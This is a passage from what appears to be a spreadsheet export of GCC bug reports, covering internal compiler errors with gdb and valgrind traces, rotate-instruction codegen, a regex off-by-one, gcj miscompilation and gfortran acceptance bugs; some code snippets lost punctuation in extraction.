 /home/john/gnu/build/m68k-coff-test/gcc/gcc/jc1.exe Character.java -fuse-
divide-subroutine -fcheck-references -fuse-boehm-gc -fkeep-inline-functions -
dumpbaseCharacter.java -da -auxbase-strip Character.o -g -O0 -version -
fencoding=UTF-8 -fclasspath= -fbootclasspath=/home/john/gnu/build/m68k-coff-
test/gcc/m68k-coff/libjava -o Character.s
GNU Java version 3.3 (m68k-coff)
        compiled by GNU C version 3.3.
GGC heuristics: --param ggc-min-expand=47 --param ggc-min-heapsize=32678
options passed:  -fuse-divide-subroutine -fcheck-references -fuse-boehm-gc
 -fkeep-inline-functions -auxbase-strip -g -O0 -fencoding=UTF-8
 -fclasspath=
 -fbootclasspath=/home/john/gnu/build/m68k-coff-test/gcc/m68k-coff/libjava
options enabled:  -fpeephole -ffunction-cse -fkeep-inline-functions
 -fkeep-static-consts -freg-struct-return -fgcse-lm -fgcse-sm
 -fsched-interblock -fsched-spec -fbranch-count-reg -fexceptions
 -funwind-tables -fasynchronous-unwind-tables -fnon-call-exceptions
 -fcommon -fgnu-linker -fargument-alias -fzero-initialized-in-bss -fident
 -fmath-errno -fbounds-check -m68020 -mc68020 -mbitfield -m68881 -m68030
 -m68332 -mcpu32
Class path starts here:
    ./
    /home/john/gnu/build/m68k-coff-test/gcc/m68k-coff/libjava/ (system)
 class Character class java.lang.String class java.lang.Object interface 
java.lang.CharSequence interface java.lang.Comparable interface 
java.io.Serializable cl
ass java.lang.String$CaseInsensitiveComparator interface java.util.Comparator 
[Character. ()] [Character. ()]Character.java: In class `Character':
Character.java: In method `()':
Character.java:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
== gdb output of jc1 run
This GDB was configured as i686-pc-cygwin...
(gdb) run
Starting program: /home/john/gnu/build/m68k-coff-test/gcc/gcc/jc1.exe 
Character.
java -g0 -O0 -fclasspath= -fbootclasspath=/home/john/gnu/build/m68k-coff-
test/gc
c/m68k-coff/libjava -o Character.s
 class Character class java.lang.String class java.lang.Object interface 
java.la
ng.CharSequence interface java.lang.Comparable interface java.io.Serializable 
cl
ass java.lang.String$CaseInsensitiveComparator interface java.util.Comparator 
[C
haracter. ()] [Character. ()]
Program received signal SIGSEGV Segmentation fault.
0x00531020 in emit_block_move_via_libcall (dst=0x12a2f60 src=0x12a2f90 
size=0x
12703f0) at /home/john/gnu/gcc-3.3/gcc/expr.c:1933
1933        size_mode = TYPE_MODE (unsigned_type_node)
(gdb) list
1928      src = copy_to_mode_reg (Pmode XEXP (src 0))
1929
1930      if (TARGET_MEM_FUNCTIONS)
1931        size_mode = TYPE_MODE (sizetype)
1932      else
1933        size_mode = TYPE_MODE (unsigned_type_node)
1934      size = convert_to_mode (size_mode size 1)
1935      size = copy_to_mode_reg (size_mode size)
1936
1937      /* It is incorrect to use the libcall calling conventions to call
(gdb) where
#0  0x00531020 in emit_block_move_via_libcall (dst=0x12a2f60 src=0x12a2f90 
siz
e=0x12703f0) at /home/john/gnu/gcc-3.3/gcc/expr.c:1933
#1  0x00530d28 in emit_block_move (x=0x12a2f40 y=0x12a2f50 size=0x12703f0 
met
hod=BLOCK_OP_NORMAL) at /home/john/gnu/gcc-3.3/gcc/expr.c:1756
#2  0x00537959 in store_expr (exp=0x128f6d8 target=0x12a2950 want_value=0) at
/home/john/gnu/gcc-3.3/gcc/expr.c:4619
#3  0x0053b77c in store_field (target=0x12a2930 bitsize=480 bitpos=96 
mode=BL
Kmode exp=0x128f6d8 value_mode=VOIDmode unsignedp=0 type=0x12bb0e0 
alias_se
t=0) at /home/john/gnu/gcc-3.3/gcc/expr.c:5618
#4  0x00535cab in expand_assignment (to=0x12bc288 from=0x128f6d8 
want_value=0
 suggest_reg=0) at /home/john/gnu/gcc-3.3/gcc/expr.c:4128
#5  0x0049bb2d in java_expand_expr (exp=0x128f6f0 target=0x12a25f0 
tmode=SImod
e modifier=0) at /home/john/gnu/gcc-3.3/gcc/java/expr.c:2573
#6  0x00554d0e in expand_expr (exp=0x128f6f0 target=0x12a25f0 tmode=SImode 
mo
difier=EXPAND_NORMAL) at /home/john/gnu/gcc-3.3/gcc/expr.c:9392
#7  0x005368cb in store_expr (exp=0x128f6f0 target=0x12a25f0 want_value=1) at
/home/john/gnu/gcc-3.3/gcc/expr.c:4379
#8  0x0053629e in expand_assignment (to=0x12a1620 from=0x128f6f0 
want_value=1
 suggest_reg=0) at /home/john/gnu/gcc-3.3/gcc/expr.c:4252
#9  0x00552bf0 in expand_expr (exp=0x128f708 target=0x0 tmode=VOIDmode 
modifi
er=EXPAND_NORMAL) at /home/john/gnu/gcc-3.3/gcc/expr.c:9031
#10 0x00541706 in expand_expr (exp=0x12ba2e0 target=0x0 tmode=VOIDmode 
modifi
er=EXPAND_NORMAL) at /home/john/gnu/gcc-3.3/gcc/expr.c:6831
#11 0x0049bedb in java_expand_expr (exp=0x12b8360 target=0x1270210 
tmode=VOIDm
ode modifier=0) at /home/john/gnu/gcc-3.3/gcc/java/expr.c:2617
#12 0x00554d0e in expand_expr (exp=0x12b8360 target=0x0 tmode=VOIDmode 
modifi
er=EXPAND_NORMAL) at /home/john/gnu/gcc-3.3/gcc/expr.c:9392
#13 0x005ef75a in expand_expr_stmt_value (exp=0x12b8360 want_value=0 
maybe_las
t=1) at /home/john/gnu/gcc-3.3/gcc/stmt.c:2184
#14 0x005ef5ec in expand_expr_stmt (exp=0x12b8360) at /home/john/gnu/gcc-
3.3/gcc
/stmt.c:2138
#15 0x00439c6f in source_end_java_method () at /home/mitchell/gcc-3.3/gcc-
3.3/gc
c/java/parse.y:7506
#16 0x0043cfad in java_expand_method_bodies (class=0x12a1460) 
at /home/mitchell/
gcc-3.3/gcc-3.3/gcc/java/parse.y:8203
#17 0x0044212b in java_expand_classes () at /home/mitchell/gcc-3.3/gcc-
3.3/gcc/j
ava/parse.y:9184
#18 0x004bb3bc in java_parse_file (set_yydebug=0) at /home/john/gnu/gcc-
3.3/gcc/
java/jcf-parse.c:1144
#19 0x004e333a in compile_file () at /home/john/gnu/gcc-3.3/gcc/toplev.c:2130
#20 0x004ea749 in do_compile () at /home/john/gnu/gcc-3.3/gcc/toplev.c:5370
#21 0x004ea79f in toplev_main (argc=8 argv=0x101126e0) at /home/john/gnu/gcc-
3.
3/gcc/toplev.c:5400
#22 0x004dacf0 in main (argc=8 argv=0x101126e0) at /home/john/gnu/gcc-
3.3/gcc/m
ain.c:35
(gdb)</t>
  </si>
  <si>
    <t>GCC-62263</t>
  </si>
  <si>
    <t>Good codegen for bitwise rotate requires code that is technically undefined behavior</t>
  </si>
  <si>
    <t>LLVM lacks an intrinsic for performing bitwise rotation relying instead on spotting the classic C idioms for specifying rotation using two shifts.  Unfortunately when the rotation is defined by variable its ability to spot rotation code is poor.
Code that supports a variable rotation also needs to handle rotation-by-zero which the underlying instruction has no problem with but when translated into the classic C idiom results in an undefined shift (because shifting a 32-bit integer by 32 bits isn't allowed).
In the following code only rotate32_undefined1 rotate32_undefined2 and _rotl32_doubleand1 compiles to a simple rotate instruction.   rotl32_zerocheck also compiles to a rotate but it contains a redundant test for zero -- a test that is necessary in the C code but not necessary for the rotate.
Somewhat annoyingly Clang 3.5 also has poor rotation detection and only detects it for rotl_doubleand2 and rotl_doubleand3 as well as rotl32_undefined2.  It is filed as http://llvm.org/bugs/show_bug.cgi?id=20750
Thus GCC and Clang differ as to which code they want for a rotate and neither is good at recognizing variations of the rotate idiom.
--- C code ---
unsigned int rotl32_undefined1(unsigned int v unsigned char r)
{
    r = r 
    return (v &gt; (32 - r))
}
unsigned int rotl32_undefined2(unsigned int v unsigned char r)
{
    return (v &lt;&lt; (r 
}
unsigned int rotl32_zerocheck(unsigned int v unsigned char r)
{
    r = r 
    return r ? (v &gt; (32 - r)) : v
}
unsigned int rotl32_doubleand1(unsigned int v unsigned char r)
{
    r = r 
    return (v &gt; ((32 - r) 
}
unsigned int rotl32_doubleand2(unsigned int v unsigned char r)
{
    return (v &lt;&lt; (r 
}
unsigned int rotl32_doubleand3(unsigned int v unsigned char r)
{
    return (v &lt;&lt; (r 
}
--- Assembly output gcc 4.9.0 -O3 -fomit-frame-pointer ---
_rotl32_undefined1:
LFB0:
	movl	%esi %ecx
	movl	%edi %eax
	andl	$31 %ecx
	roll	%cl %eax
	ret
LFE0:
	.section __TEXT__text_coldregularpure_instructions
LCOLDE0:
	.text
LHOTE0:
	.section __TEXT__text_coldregularpure_instructions
LCOLDB1:
	.text
LHOTB1:
	.align 40x90
	.globl _rotl32_undefined2
_rotl32_undefined2:
LFB1:
	movl	%esi %ecx
	movl	%edi %eax
	andl	$31 %ecx
	roll	%cl %eax
	ret
LFE1:
	.section __TEXT__text_coldregularpure_instructions
LCOLDE1:
	.text
LHOTE1:
	.section __TEXT__text_coldregularpure_instructions
LCOLDB2:
	.text
LHOTB2:
	.align 40x90
	.globl _rotl32_zerocheck
_rotl32_zerocheck:
LFB2:
	movl	%esi %ecx
	movl	%edi %eax
	andl	$31 %ecx
	roll	%cl %eax
	testb	%cl %cl
	cmove	%edi %eax
	ret
LFE2:
	.section __TEXT__text_coldregularpure_instructions
LCOLDE2:
	.text
LHOTE2:
	.section __TEXT__text_coldregularpure_instructions
LCOLDB3:
	.text
LHOTB3:
	.align 40x90
	.globl _rotl32_doubleand1
_rotl32_doubleand1:
LFB3:
	movl	%esi %ecx
	movl	%edi %eax
	andl	$31 %ecx
	roll	%cl %eax
	ret
LFE3:
	.section __TEXT__text_coldregularpure_instructions
LCOLDE3:
	.text
LHOTE3:
	.section __TEXT__text_coldregularpure_instructions
LCOLDB4:
	.text
LHOTB4:
	.align 40x90
	.globl _rotl32_doubleand2
_rotl32_doubleand2:
LFB4:
	movl	%esi %ecx
	movl	%edi %eax
	negl	%ecx
	shrl	%cl %eax
	movl	%esi %ecx
	andl	$31 %ecx
	sall	%cl %edi
	orl	%edi %eax
	ret</t>
  </si>
  <si>
    <t>oneill+gccbugs</t>
  </si>
  <si>
    <t>GCC-59756</t>
  </si>
  <si>
    <t>off-by-one error in regex</t>
  </si>
  <si>
    <t>example:
$ cat case.cpp
#include 
#include 
#include 
int main() {
    std::string re_s(abc(def)ghi)
    std::regex re(re_s)
    std::smatch mch
    std::regex_match(std::string(abcdefghi) mch re)
    std::cout &lt;&lt; mch[1].str() &lt;&lt; std::endl
}
compilation:
$ g++-4.8.2 case.cpp -std=c++11 -o case
actual result:
$ ./case
cdef
expected result:
$ ./case
def</t>
  </si>
  <si>
    <t>Nikolay.Bozhenov</t>
  </si>
  <si>
    <t>GCC-23230</t>
  </si>
  <si>
    <t>Wrong this used when call made to superclass which is also superclass of enclosing class</t>
  </si>
  <si>
    <t>The following file is miscompiled by gcj -C:
public class Outer extends Thread {
  public class Inner extends Thread {
    private Inner () {
      start ()
    }
  }
}
It uses the wrong this to call start():
Outer$Inner(Outer)
  Code:
   0:   aload_0
   1:   aload_1
   2:   putfield        #12 //Field this$0:LOuter
   5:   aload_0
   6:   invokespecial   #15 //Method java/lang/Thread.:()V
   9:   aload_1
   10:  invokevirtual   #18 //Method java/lang/Thread.start:()V
   13:  return
}
Sun's compiler outputs correct code:
private Outer$Inner(Outer)
  Code:
   0:   aload_0
   1:   aload_1
   2:   putfield        #1 //Field this$0:LOuter
   5:   aload_0
   6:   invokespecial   #2 //Method java/lang/Thread.:()V
   9:   aload_0
   10:  invokevirtual   #3 //Method start:()V
   13:  return
}
The difference is at 9.
Note: The bug does not occur if you just replace start() (which is declared in
java.lang.Thread) with notify() (which is declared in java.lang.Object).</t>
  </si>
  <si>
    <t>GCC-13352</t>
  </si>
  <si>
    <t>ICE SIGSEGV during bootstrap on libstdc++-v3/testsuite/testsuite_hooks.cc with the zone GC</t>
  </si>
  <si>
    <t>I get this SIGSEGV during GCC bootstrap. What is interesting is that adding
-save-temps to g++'s parameters gets me over this ICE.
libstdc++-v3/testsuite/testsuite_allocator.cc compilation which is right after
testsuite_hooks.cc ends with ICE too.
logout
~/tmp/gcc34/objdir/i386-unknown-freebsd4.9/libstdc++-v3/testsuite&gt;/home/4/wilx/tmp/gcc34/objdir/gcc/g++
-v
Reading specs from /home/4/wilx/lib/gcc/i386-unknown-freebsd4.9/3.4/specs
Configured with: ../srcdir/configure --disable-nls
--enable-version-specific-runtime-libs --enable-dwarf2 --with-cpu=i686
--with-arch=i686 --with-system-zlib --disable-shared --prefix=/home/4/wilx
--enable-languages=cc++ --with-gc=zone --disable-sjlj-exceptions
Thread model: posix
gcc version 3.4 20031208 (experimental)
/home/4/wilx/tmp/gcc34/objdir/gcc/cc1plus -quiet -nostdinc++ -v -I.
-I../../../../srcdir/libstdc++-v3/testsuite -I..
-I/home/4/wilx/tmp/gcc34/objdir/i386-unknown-freebsd4.9/libstdc++-v3/include/i386-unknown-freebsd4.9
-I/home/4/wilx/tmp/gcc34/objdir/i386-unknown-freebsd4.9/libstdc++-v3/include
-I/home/4/wilx/tmp/gcc34/srcdir/libstdc++-v3/libsupc++ -I/usr/X11R6/include
-iprefix
/home/4/wilx/tmp/gcc34/objdir/gcc/../lib/gcc/i386-unknown-freebsd4.9/3.4/
-isystem /home/4/wilx/tmp/gcc34/objdir/gcc/include -isystem
/home/4/wilx/i386-unknown-freebsd4.9/bin/include -isystem
/home/4/wilx/i386-unknown-freebsd4.9/lib/include -DHAVE_CONFIG_H -isystem
/home/4/wilx/i386-unknown-freebsd4.9/include -isystem
/home/4/wilx/i386-unknown-freebsd4.9/sys-include -include bits/stdc++.h
../../../../srcdir/libstdc++-v3/testsuite/testsuite_hooks.cc -quiet -dumpbase
testsuite_hooks.cc -march=i686 -auxbase-strip testsuite_hooks.o -g -O2 -O2
-version -o /home/4/wilx/tmp/tmp/ccNqcKWa.s
GNU C++ version 3.4 20031208 (experimental) (i386-unknown-freebsd4.9)
        compiled by GNU C version 3.4 20031208 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
In file included from /home/4/wilx/tmp/gcc34/objdir/gcc/include/stddef.h:57
                 from
/home/4/wilx/tmp/gcc34/objdir/i386-unknown-freebsd4.9/libstdc++-v3/include/cstddef:48
                 from
../../../../srcdir/libstdc++-v3/testsuite/testsuite_hooks.h:63
                 from
../../../../srcdir/libstdc++-v3/testsuite/testsuite_hooks.cc:31:
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: conflicting
declaration 'typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error:
'__mbstate_t' has a previous declaration as `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: declaration
of `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: conflicts
with previous declaration `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: declaration
of `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: conflicts
with previous declaration `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: declaration
of `typedef union __mbstate_t __mbstate_t'
/home/4/wilx/tmp/gcc34/objdir/gcc/include/machine/ansi.h:156: error: conflicts
with previous declaration `typedef union __mbstate_t __mbstate_t'
Program received signal SIGSEGV Segmentation fault.
0x083ca973 in ggc_get_size (p=0x2a35d8de) at ../../srcdir/gcc/ggc-zone.c:473
473       L2 = LOOKUP_L2 (p)
(gdb) bt
#0  0x083ca973 in ggc_get_size (p=0x2a35d8de) at ../../srcdir/gcc/ggc-zone.c:473
#1  0x08261501 in ggc_realloc (x=0x2a35d8de size=197632) at
../../srcdir/gcc/ggc-common.c:149
#2  0x081cfcf9 in equate_decl_number_to_die (decl=0xc decl_die=0x2873d670)
    at ../../srcdir/gcc/dwarf2out.c:5184
#3  0x081dc5c9 in gen_subprogram_die (decl=0x2874fc60 context_die=0x0)
    at ../../srcdir/gcc/dwarf2out.c:10738
#4  0x081d6be3 in gen_decl_die (decl=0x2874fc60 context_die=0x2873d3bc)
    at ../../srcdir/gcc/dwarf2out.c:11869
#5  0x081d8f7f in gen_type_die (type=0x2874eca4 context_die=0x2ae99c3f)
    at ../../srcdir/gcc/dwarf2out.c:11302
#6  0x081d9eab in modified_type_die (type=0x2874eca4 is_const_type=0
is_volatile_type=0
    context_die=0x2ae99c3f) at ../../srcdir/gcc/dwarf2out.c:7937
#7  0x081da336 in add_type_attribute (object_die=0x2873d348 type=0xc
decl_const=0 decl_volatile=0
    context_die=0x0) at ../../srcdir/gcc/dwarf2out.c:10112
#8  0x081d7418 in gen_decl_die (decl=0x28750484 context_die=0x2ae99c3f)
    at ../../srcdir/gcc/dwarf2out.c:11436
#9  0x083a0140 in rest_of_decl_compilation (decl=0x28750484
    asmspec=0x1  top_level=1 at_end=0)
    at ../../srcdir/gcc/toplev.c:1990
#10 0x0807a602 in cp_finish_decl (decl=0x28750484 init=0x0 asmspec_tree=0xc
flags=0)
    at ../../srcdir/gcc/cp/decl.c:4748
#11 0x080efd90 in cp_parser_init_declarator (parser=0x2873cc20
decl_specifiers=0x2874ec4c
    prefix_attributes=0x0 function_definition_allowed_p=true member_p=false
    declares_class_or_enum=2 function_definition_p=0xbfbff377) at
../../srcdir/gcc/cp/parser.c:9712
#12 0x080eff92 in cp_parser_simple_declaration (parser=0x2873cc20
function_definition_allowed_p=true)
    at ../../srcdir/gcc/cp/parser.c:6296
#13 0x080f00e8 in cp_parser_block_declaration (parser=0x2873cc20 statement_p=false)
    at ../../srcdir/gcc/cp/parser.c:6212
#14 0x080f0cbf in cp_parser_declaration (parser=0x2873cc20) at
../../srcdir/gcc/cp/parser.c:6132
#15 0x080f0f7f in cp_parser_declaration_seq_opt (parser=0x2873cc20)
    at ../../srcdir/gcc/cp/parser.c:6041
#16 0x080f112f in c_parse_file () at ../../srcdir/gcc/cp/parser.c:2245
#17 0x0817cd5e in c_common_parse_file (set_yydebug=0) at
../../srcdir/gcc/c-opts.c:1227
#18 0x083a3e6e in toplev_main (argc=0 argv=0xbfbffa82) at
../../srcdir/gcc/toplev.c:1808
#19 0x0818055e in main (argc=0 argv=0x0) at ../../srcdir/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-83318</t>
  </si>
  <si>
    <t>Illegal program causes internal compiler error with tags gfc_trans_allocate at fortran/trans-stmt.c:5646  and  Aborted (program f951)</t>
  </si>
  <si>
    <t>Created attachment 42812
Stackdump from gfortran crash
the exact version of GCC: 5.4.0
the system type: cygwin 32 bit on Windows 7
the options given when GCC was configured/built: unkoown
the complete command line that triggers the bug: gfortran -g -O0 -o t.exe t.f90
the compiler output (error messages warnings etc.)
---------------------
t.f90:5:0:
     allocate(character(len=*) :: string_array(2))
 1
internal compiler error: in gfc_trans_allocate at fortran/trans-stmt.c:5646
t.f90:5:0: internal compiler error: Aborted
gfortran: internal compiler error: Aborted (program f951)
------------------
the preprocessed file: crash apparently prevents this from being constructed.
I have attached the stackdump for what that is worth.
Failing program:
----------------------
program fail
    implicit none
    character(len=:) allocatable :: string_array(:)
    allocate(character(len=*) :: string_array(2))
end program fail</t>
  </si>
  <si>
    <t>dmh</t>
  </si>
  <si>
    <t>GCC-84089</t>
  </si>
  <si>
    <t>[8 Regression] FAIL: g++.dg/cpp1y/lambda-generic-x.C  -std=gnu++14 (internal compiler error)</t>
  </si>
  <si>
    <t>spawn /test/gnu/gcc/objdir/gcc/testsuite/g++/../../xg++ -B/test/gnu/gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C -fno-diagnostics-show-caret -fdiagnostics-color=never -nostdinc++ -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include/hppa64-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa64-hp-hpux11.11/libstdc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/libstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -std=gnu++14 -Wpedantic -S -o lambda-generic-x.s
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C: In function 'int main()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C:9:22: warning: lambda templates are only available with -std=c++2a or -std=gnu++2a [-Wpedantic]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C:11:23: warning: lambda templates are only available with -std=c++2a or -std=gnu++2a [-Wpedantic]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C: In lambda function:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C:12:17: warning: lambda templates are only available with -std=c++2a or -std=gnu++2a [-Wpedantic]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C: In function 'int main()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C:19:26: warning: lambda templates are only available with -std=c++2a or -std=gnu++2a [-Wpedantic]
during RTL pass: expand
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C: In lambda function:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/cpp1y/lambda-generic-x.C:13:42: internal compiler error: Arithmetic exception
This is a division by zero.</t>
  </si>
  <si>
    <t>GCC-39827</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE (segfault) when compiling gcc/varasm.c (in notice_global_symbol)</t>
  </si>
  <si>
    <t>When bootstrapping (rev. 146452) I get the ICE in stage2:
/home/tob/projects/gcc/gcc/varasm.c: In Function notice_global_symbol:
/home/tob/projects/gcc/gcc/varasm.c:1595: internal compiler error: segmentation fault
That's on x86-64-linux with the MALLOC_CHECK_=2 MALLOC_PERTURB_=D environment variables set.
Valgrind shows:
==19870== Invalid read of size 8
==19870==    at 0x1648E68: propagate_with_phi (tree-ssa-phiprop.c:242)
==19870==    by 0x164954C: tree_ssa_phiprop (tree-ssa-phiprop.c:349)
==19870==    by 0xD27E20: execute_one_pass (passes.c:1290)
==19870==    by 0xD27FB7: execute_pass_list (passes.c:1339)
==19870==    by 0xD27FD5: execute_pass_list (passes.c:1340)
==19870==    by 0x12174DF: tree_rest_of_compilation (tree-optimize.c:437)
==19870==    by 0x1ABC634: cgraph_expand_function (cgraphunit.c:1051)
==19870==    by 0x1ABC7E4: cgraph_expand_all_functions (cgraphunit.c:1110)
==19870==    by 0x1ABCDA3: cgraph_optimize (cgraphunit.c:1324)
==19870==    by 0x4E5076: c_write_global_declarations (c-decl.c:8184)
==19870==    by 0xFBE33F: compile_file (toplev.c:988)
==19870==    by 0xFC02D6: do_compile (toplev.c:2248)
==19870==  Address 0x8292c30 is 0 bytes after a block of size 1472 alloc'd
==19870==    at 0x4C23784: calloc (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==19870==    by 0x22808F0: xcalloc (xmalloc.c:162)
==19870==    by 0x1649483: tree_ssa_phiprop (tree-ssa-phiprop.c:342)
==19870==    by 0xD27E20: execute_one_pass (passes.c:1290)
==19870==    by 0xD27FB7: execute_pass_list (passes.c:1339)
==19870==    by 0xD27FD5: execute_pass_list (passes.c:1340)
==19870==    by 0x12174DF: tree_rest_of_compilation (tree-optimize.c:437)
==19870==    by 0x1ABC634: cgraph_expand_function (cgraphunit.c:1051)
==19870==    by 0x1ABC7E4: cgraph_expand_all_functions (cgraphunit.c:1110)
==19870==    by 0x1ABCDA3: cgraph_optimize (cgraphunit.c:1324)
==19870==    by 0x4E5076: c_write_global_declarations (c-decl.c:8184)
==19870==    by 0xFBE33F: compile_file (toplev.c:988)
==19870==                                                                                                                                                            
==19870== Invalid read of size 8
==19870==    at 0x1648FAB: propagate_with_phi (tree-ssa-phiprop.c:252)
==19870==    by 0x164954C: tree_ssa_phiprop (tree-ssa-phiprop.c:349)
==19870==    by 0xD27E20: execute_one_pass (passes.c:1290)
==19870==    by 0xD27FB7: execute_pass_list (passes.c:1339)
==19870==    by 0xD27FD5: execute_pass_list (passes.c:1340)
==19870==    by 0x12174DF: tree_rest_of_compilation (tree-optimize.c:437)
==19870==    by 0x1ABC634: cgraph_expand_function (cgraphunit.c:1051)
[...]
==19870== Invalid read of size 8
==19870==    at 0x1648562: phivn_valid_p (tree-ssa-phiprop.c:107)
==19870==    by 0x1648FCC: propagate_with_phi (tree-ssa-phiprop.c:252)
==19870==    by 0x164954C: tree_ssa_phiprop (tree-ssa-phiprop.c:349)
==19870==  Address 0x8292c38 is 8 bytes after a block of size 1472 alloc'd                                                                                          
==19870==    at 0x4C23784: calloc (in /usr/lib64/valgrind/amd64-linux/vgpreload_memcheck.so)
==19870==    by 0x22808F0: xcalloc (xmalloc.c:162)
==19870==    by 0x1649483: tree_ssa_phiprop (tree-ssa-phiprop.c:342)
==19870==    by 0xD27E20: execute_one_pass (passes.c:1290)
==19870==    by 0xD27FB7: execute_pass_list (passes.c:1339)
[...]
==19870== Invalid read of size 1
==19870==    at 0x163B786: gimple_code (gimple.h:1030)
==19870==    by 0x163BAA5: gimple_has_mem_ops (gimple.h:1240)
==19870==    by 0x163BC99: gimple_vuse (gimple.h:1322)
==19870==    by 0x1648572: phivn_valid_p (tree-ssa-phiprop.c:112)
... and then the ICE.</t>
  </si>
  <si>
    <t>GCC-25766</t>
  </si>
  <si>
    <t>objc.dg/stret-2.m fails on i686-darwin</t>
  </si>
  <si>
    <t>objc.dg/stret-2.m fails on i686-darwin because some struct is return not via the stack but by registers.  Though I don't know for sure if this is correct so I am filing this bug.</t>
  </si>
  <si>
    <t>GCC-56294</t>
  </si>
  <si>
    <t>BOOT_CFLAGS='-O2 -g -fno-ipa-sra' leads to bootstrap comparison failure</t>
  </si>
  <si>
    <t>Bootstrapping pristine trunk with BOOT_CFLAGS='-O2 -g -fno-ipa-sra'
leads to comparison failure because gcc/tree-ssa-loop-ivopts.o differs.
Just switching IPA-SRA on (by a patch) when compiling that file
resolves the problem.
The failure has been introduced with revision 192848:
    2012-10-26  Martin Jambor  
        PR debug/54971
        * tree-sra.c (struct access): New flag grp_to_be_debug_replaced.
        (dump_access): Dump the new flag.
        (analyze_access_subtree): Set the new flag when appropriate.
        (create_access_replacement): Handle debug replacements differently.
        (generate_subtree_copies): Handle the grp_to_be_debug_replaced flag.
        (init_subtree_with_zero): Likewise.
        (sra_modify_expr): Likewise.
        (load_assign_lhs_subreplacements): Likewise.
        (sra_modify_assign): Likewise.
So I'll assign it to myself.</t>
  </si>
  <si>
    <t>GCC-64616</t>
  </si>
  <si>
    <t>Redundant ldr when accessing var inside and outside a loop</t>
  </si>
  <si>
    <t>When compiling the below example with -O2 2 ldr are generated to access the variable some: one for the loop and one for the store.
int g (int)
unsigned int glob
void
f (void)
{
  while (g (glob))
  glob = 1
}
{code}
The following code is then generated:
f:
push    {r3 r4 r5 lr}
ldr     r5 .L6
.L2:
ldr     r0 [r5]
ldr     r4 .L6
bl      g
cmp     r0 #0
bne     .L2
movs    r3 #1
str     r3 [r4]
pop     {r3 r4 r5 pc}
Note the redundant load of the address at offset 2c in instructions at offsets 4 and 14.</t>
  </si>
  <si>
    <t>GCC-17816</t>
  </si>
  <si>
    <t>duplicate definition of pure virtual function not diagnosed</t>
  </si>
  <si>
    <t>struct S {
  virtual int foo() = 0
}
int S::foo() { return 0 }
int S::foo() { return 0 }
Affects at least gcc 3.2 and forward.</t>
  </si>
  <si>
    <t>GCC-28771</t>
  </si>
  <si>
    <t>gfortran accepts invalid variable definition</t>
  </si>
  <si>
    <t>As far as I know the following code snippet is not valid Fortran:
program test
  character(len=*) :: foo = 'test'
end
To make the code correct the variable definition either needs the parameter attribute or an explicit length.
Other compilers (Intel Fujitsu and NAG) reject this code but all current versions of gfortran accept it without warning.</t>
  </si>
  <si>
    <t>GCC-35012</t>
  </si>
  <si>
    <t>gcc-4.2.3-RC1's gctest hangs on i686-apple-darwin9</t>
  </si>
  <si>
    <t>I confirm the problem reported by Jack Howarth in 
http://gcc.gnu.org/ml/gcc/2008-01/msg00484.html:
gcc-4.2.3-RC1's gctest hangs on i686-apple-darwin9.
With gcc 4.3 rev. 131923 I get:
[ibook-dhum] i686-apple-darwin9/boehm-gc% time make check
Making check in include
